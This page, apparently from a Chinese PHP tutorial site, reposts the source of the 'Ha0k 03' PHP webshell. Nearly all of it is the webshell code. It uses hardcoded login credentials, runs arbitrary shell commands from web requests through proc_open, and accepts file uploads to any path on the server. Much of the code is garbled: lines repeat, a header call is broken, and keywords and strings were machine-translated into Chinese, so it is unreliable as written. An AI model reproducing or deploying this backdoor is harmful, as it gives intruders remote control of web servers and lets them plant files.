搜尋

首頁 >後端開發 >php教程 >Ha0k 03 PHP 網頁木馬修改版

Ha0k 03 PHP 網頁木馬修改版

WBOY
WBOY原創
2016-07-29 08:40:57942瀏覽

複製程式碼 程式碼如下:


//此處可設定多個使用者
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb') ;
/* 此處設定指令的別名*/
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/header('HTTP/ 1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* 開始session */
session_start()
/* 開始session */
session_start()
/* 開始session */
session_start()
/* 開始session */
session_start()
/* 開始session */
session_start()
/* 開始session */
session_start(); /* 初始化session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd( ); //取目前目錄
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST ['command'])) { if (get_magic_quotes_gpc()) { //0表關閉,1表開啟,開啟時過濾/* We don't want to add the commands to the history in the * escaped form, so we remove the backslashes now. */ $_REQUEST['command'] = stripslashes($_REQUEST['command']); //將以addslashes()函數處理後的字元字串回傳} /* history */ if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //尋找保存陣列中的值unset($_SESSION['history'][$i]); //銷毀array_unshift($_SESSION['history'], $_REQUEST['command']);/ /array_unshift()函數的作用是在一個陣列中插入新的元素。而這個新的陣列將會被加入到原數組的開頭部分。函數最終傳回的是插入新元素後的陣列。
/* 輸出Ha0k# 指令 */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['指令'] 。 “n”;
/* 初始化目前工作目錄。 */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd' ] = 目錄名(__FILE__); //取得目前所在目錄
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$' , $_REQUEST['command'] , $regs)) {
/* 目前命令是一個'cd' 命令,我們必須將
* 作為內部shell 命令處理。 */
if ($regs[1][0] == '/') {
/* 絕對路徑,我們不加改動地使用它。 */
$new_dir = $regs[1];
} else {
/* 相對路徑,我們將其附加到當前工作
* 目錄。 */
$new_dir = $_SESSION['cwd'] . '/' 。 $regs[1];
}
/* 將'/./' 轉換為'/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace( '/./', '/', $new_dir);
/* 將'//' 轉換為'/' */
while (strpos($new_dir, '/ /') !== false)
$new_dir = str_replace('//', ' /', $new_dir);
/* 將'x/..' 轉換為'' */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace(' |/?[^/]+/..(?!.)|', ' ', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* 嘗試更改目錄。 */
if (@chdir($new_dir)) { //改變目前目錄
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: 無法更改為: $new_dirn";
}
} else {
/* 該命令不是'cd' 命令,因此我們在
* 更改目錄並保存輸出後執行它。 */
chdir($_SESSION['cwd']); //改變目錄
/* 別名擴充*/
$length = strcspn($_REQUEST['command'], " t"); // 找出t字串,回傳位置
$token = substr($_REQUEST['command'], 0, $length); //取字串0-t
if (isset($aliases[$ token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['指令'], $length);
$p = proc_open($_REQUEST['command' ], // 執行腳本
array(1 => array('pipe', 'w'),
2 => array('管道', 'w')),
$io);
/* 書寫書寫*/
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), / /轉換特殊字元為HTML字元編碼
ENT_COMPAT, 'GB2312');
}
/* 書寫*/
while (!feof($io[2])) {
$_SESSION ['output'] .= htmlspecialchars(fgets($io[2]) ),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose( $io[2]);
proc_close($p);//關閉管道
}
}
/* 在JavaScript 中建立使用命令歷史記錄*/
if (empty( $_SESSION['history']) ) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//將搞成字串
}
}
header( '內容型:文字/html;字元集=GB2312');
echo '' 。 “n”;
? >
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST[ '遠端檔案']);
//echo "上傳檔案成功: " . $HTTP_POST_FILES['使用者檔案']['名稱'];
}
? >
BR>"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >


Ha0k webshel l

var current_line = 0;
var command_hist = new Array( );
var 最後= 0;
功能鍵(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line command_hist[current_line] = document.shell.command.value;
當前行++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
目前行--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.opoutput.scrollT.shell. = document.shell.output.scrollHeight;
document.shell.command.focus();
}
腳本>

.STYLE1 {
顏色:#33FF33;
字型粗細:粗體;
}
a:link {
文字裝飾:無;
}
a:訪問過{
文字裝飾:無;
}
a:hover {
文字裝飾:無;
}
a:active {
文字裝飾:無;
}
-->
風格>

HA0K
我們只為正義,為正義而戰

;

您未能向PhpShell驗證自己的身份。您可以href="">重新載入再試一次。


嘗試閱讀INSTALL如果您在安裝 PhpShell 時遇到
問題,請查看此文件。


身體>

退出;
}
錯誤回報(E_ALL);
if (空($_REQUEST['行'])) $_REQUEST['行'] = 10;
? >

目前目錄為: <?php echo $_SESSION['cwd'] ?>

;

;



$ 大小=「78」tabindex =“1”>





行數: >


表格>


本地檔名:

遠端檔名:

表格>
身體>

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
上一篇:localhost 關於Appserv無法開啟localhost問題的解決方法下一篇:localhost 關於Appserv無法開啟localhost問題的解決方法

相關文章

看更多